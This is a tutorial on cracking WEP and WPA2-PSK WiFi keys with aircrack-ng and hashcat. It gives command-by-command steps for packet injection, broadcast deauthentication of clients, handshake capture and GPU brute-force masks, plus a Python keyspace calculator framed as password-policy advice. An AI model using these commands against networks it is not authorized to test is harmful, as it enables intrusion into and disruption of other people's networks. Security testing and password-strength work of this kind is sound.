Cracking WEP and WPA
I've used a combination of Linux and Windows in this article: Kali for the WiFi monitoring and the Aircrack-ng tools, and Windows (my gaming computer) for the actual cracking, since its GTX 970 is far more powerful than the laptop running Kali (my gaming rig has no WiFi). WEP is extremely quick to crack (10-30 seconds of listening to traffic), so don't use it, ever. It took me 30 minutes to crack a purely numerical WPA2-PSK password 8 characters long, but hashcat projected a month for a lowercase password of the same length, and over a year for an alphanumeric one. Increasing the length to 13 alphanumeric characters pushed the estimate to more than 10 years. Use a special character as well, and you're pretty safe.
WEP
N = interface number, which varies with your setup.
############
Cracking WEP
############
Cracking a WEP key can be done deterministically by analyzing enough packets.
FIRST TERMINAL WINDOW (you'll be managing two)
Prepare wifi device for penetration testing/listening mode:
# airmon-ng check kill
# airmon-ng start wlanN
Scan for wireless networks and stations:
# airodump-ng wlanNmon
Choose a target AP and station and listen to them exclusively:
# airodump-ng --bssid <AP MAC> -c <channel N> wlanNmon -w <capture output filename, e.g. the ESSID>
SECOND TERMINAL WINDOW
We need traffic to seed the cracking part. Wait for traffic (we want 5,000-6,000 packets) or inject some to make this go faster.
# aireplay-ng --arpreplay -b <AP MAC> -h <STATION MAC> wlanNmon
Crack the WEP key when you're happy with the number of packets (or use a pipe).
# aircrack-ng -z ESSID.cap
TIP:
To use the key, just remove the colons (":").
E.g. AB:CD:E1:23:45 = ABCDE12345
WPA/WPA2-PSK
N = interface number, which varies with your setup.
#################
Cracking WPA/WPA2
#################
Cracking a WPA key can be done by capturing and attacking a connection handshake.
FIRST TERMINAL WINDOW (you'll be managing two)
Prepare wifi device for penetration testing/listening mode:
# airmon-ng check kill
# airmon-ng start wlanN
Scan for wireless networks and stations:
# airodump-ng wlanNmon
Choose a target AP and station and listen to them exclusively:
# airodump-ng --bssid <AP MAC> -c <channel N> wlanNmon -w <handshake output filename, e.g. the ESSID>
SECOND TERMINAL WINDOW
Attempt a forced re-connect so we can capture their handshake:
# aireplay-ng --deauth 5 -a <AP MAC> -c <STATION MAC> wlanNmon
NOTE: If the -c parameter is omitted, all clients are disconnected (broadcast deauth).
This is a noisy action, but it also means a bigger school of fish.
Broadcast doesn't always work, though.
WAIT FOR THE HANDSHAKE IN THE FIRST TERMINAL WINDOW. (TIP: The capture file can be inspected by hand with Wireshark.)
Prepare the handshake/cap file for GPU-based oclHashcat cracking:
# wpaclean <out.cap> <in.cap>    (note: the output file is the first argument)
# aircrack-ng <out.cap> -J <out.hccap>
THE CRACKING PART
Windows oclHashcat/cudaHashcat examples:
You can download oclHashcat from http://hashcat.net/hashcat/
Dictionary attack:
C:\> cudaHashcat64.exe -m 2500 out.hccap wordlist.txt    (add -r rule1.rule etc. if using rules)
Mask attack (Brute Force):
C:\> cudaHashcat64.exe -m 2500 -a 3 -i out.hccap ?a?a?a?a?a?a?a?a?a?a?a?a?a?a?a
NOTES on mask charsets:
?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?s = «space»!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
?a = ?l?u?d?s
?b = 0x00 - 0xff
TIP:
-1 creates a custom charset, -2 a second one, and so on.
E.g. a lowercase alphanumeric custom charset [a-z0-9] repeated 5 times:
C:\> cudaHashcat64.exe -m 2500 -a 3 -i out.hccap -1 ?l?d ?1?1?1?1?1
NOTE on result:
The cracked password will be saved in a .pot file.
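As an added example (not part of the original write-up), the following Python script turns a hashcat mask, built from the built-in and custom charsets listed in the notes above, into a keyspace size and a worst-case exhaustion time. It is the arithmetic behind the "13+ characters plus a special character" advice in the introduction, and is meant for checking your own passphrase policy; the guess rate it uses is an assumption for illustration, not a measured figure.

```python
import string

# Built-in hashcat charsets; sizes match the "NOTES on mask charsets" above.
BUILTIN = {
    "l": string.ascii_lowercase,                 # 26
    "u": string.ascii_uppercase,                 # 26
    "d": string.digits,                          # 10
    "s": " " + string.punctuation,               # 33: space plus ASCII punctuation
    "b": bytes(range(256)).decode("latin-1"),    # 256 raw byte values
}
BUILTIN["a"] = BUILTIN["l"] + BUILTIN["u"] + BUILTIN["d"] + BUILTIN["s"]  # 95

def expand_charset(spec, custom):
    """Expand '?l?d' or 'abc?d' into a set; `custom` holds expanded -1..-4 charsets."""
    chars, i = set(), 0
    while i < len(spec):
        if spec[i] == "?" and i + 1 < len(spec):
            key = spec[i + 1]
            if key in custom:
                chars |= custom[key]
            elif key in BUILTIN:
                chars |= set(BUILTIN[key])
            else:
                raise ValueError(f"unknown charset ?{key}")
            i += 2
        else:
            chars.add(spec[i])           # literal character
            i += 1
    return chars

def mask_keyspace(mask, custom_specs=None):
    """Candidates a mask generates, e.g. '?1?1?1?1?1' with custom_specs={'1': '?l?d'}."""
    custom = {k: expand_charset(v, {}) for k, v in (custom_specs or {}).items()}
    total, i = 1, 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask):
            total *= len(expand_charset(mask[i:i + 2], custom))
            i += 2
        else:
            i += 1                       # a literal position has exactly one choice
    return total

if __name__ == "__main__":
    ASSUMED_RATE = 100_000   # assumed -m 2500 guesses/second for one GPU; not measured
    for label, mask, custom in (("8 digits", "?d" * 8, None), ("8 lowercase", "?l" * 8, None),
                                ("13 alphanumeric", "?1" * 13, {"1": "?l?u?d"}),
                                ("13 printable ASCII", "?a" * 13, None)):
        space = mask_keyspace(mask, custom)
        print(f"{label:20s} {space:>28,d} candidates  {space / ASSUMED_RATE / 86400:>16,.1f} days")
```

Divide the printed days by your own measured rate ratio to re-scale the estimate; the keyspace itself does not depend on hardware.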
More information about the tools:
Hashcat wiki
Aircrack-ng suite wiki